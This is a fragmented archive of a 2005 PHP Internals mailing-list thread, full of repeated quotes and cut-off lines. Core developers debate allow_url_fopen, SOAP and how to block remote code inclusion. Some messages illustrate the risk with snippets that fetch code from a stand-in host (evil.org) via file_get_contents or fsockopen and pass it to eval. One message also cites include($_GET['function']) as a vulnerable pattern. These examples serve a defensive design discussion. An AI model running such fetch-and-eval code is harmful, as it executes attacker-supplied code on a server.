Since comments comments were called for I thought I might weigh in
with my $0.02cdn
When configuring PHP I want a way to protect myself, and my users from
themselves when it comes to doing something silly, I've actually seen
include($_GET['function']) in running code, though thankfully never on
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
What exactly can you do with it other than query remote data sources?
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly can you do with it other than
On Jul 28, 2005, at 9:10 AM, Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly
On Jul 28, 2005, at 9:21 AM, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
At 04:39 PM 7/28/2005, George Schlossnagle wrote:
sure: eval('file_get_contents(http://evil.org;);');
You could say this is just bad policy on the part of code authors,
but that's what these options were geared to handle in the first
place, right?
I don't know, I think that if you aim that
Zeev Suraski wrote:
At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote:
It can already be done, disable_functions INI directive.
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Ilia
--
PHP Internals - PHP Runtime Development
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Or constructs-that-look-like-functions could be governed by
disable_functions (eval, echo).. that would cause other problems (like a
disabled return), though.
S
--
PHP Internals -
On Jul 28, 2005, at 9:49 AM, Ilia Alshanetsky wrote:
sure: eval('file_get_contents(http://evil.org;);');
Ok, but there is nothing (allow_url_fopen does not work here)
preventing me from doing similar via:
$fp = fsockopen(evil.org, 80);
$fp = fwrite($fp, GET /evil_code.txt
Zeev Suraski wrote:
At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file
sure: eval('file_get_contents(http://evil.org;);');
Ok, but there is nothing (allow_url_fopen does not work here) preventing
me from doing similar via:
$fp = fsockopen(evil.org, 80);
$fp = fwrite($fp, GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n);
eval(stream_get_contents($fp));
Ilia Alshanetsky wrote:
IMHO we should restrict or disabling code to just the
include/require constructs, since that is the main cause for concern.
Ultimately shy of disabling php's ability to request remote files
there is no way to prevent an attacker from fetching remote code and
then
On 7/28/05, Sean Coates [EMAIL PROTECTED] wrote:
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Or constructs-that-look-like-functions could be governed by
disable_functions (eval, echo).. that would cause other problems (like
Two answers:
(A) I do think an override is a good idea. There may be some cases where
extension code may need to hook a wrapper whether allow_url_fopen is enabled
or not. Granted the code could temporarily change that value, but that's a
hackish approach.
(B) I don't think SOAP is one of
On Wed, 27 Jul 2005, Sara Golemon wrote:
(B) I don't think SOAP is one of those cases. I would be dissapointed if
SOAP allowed *any* calls to be made when allow_url_fopen is off.
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
Adam Maccabee Trachtenberg wrote:
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
Not to mention do anything useful with it, like run queries :-)
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen
17 matches
Mail list logo
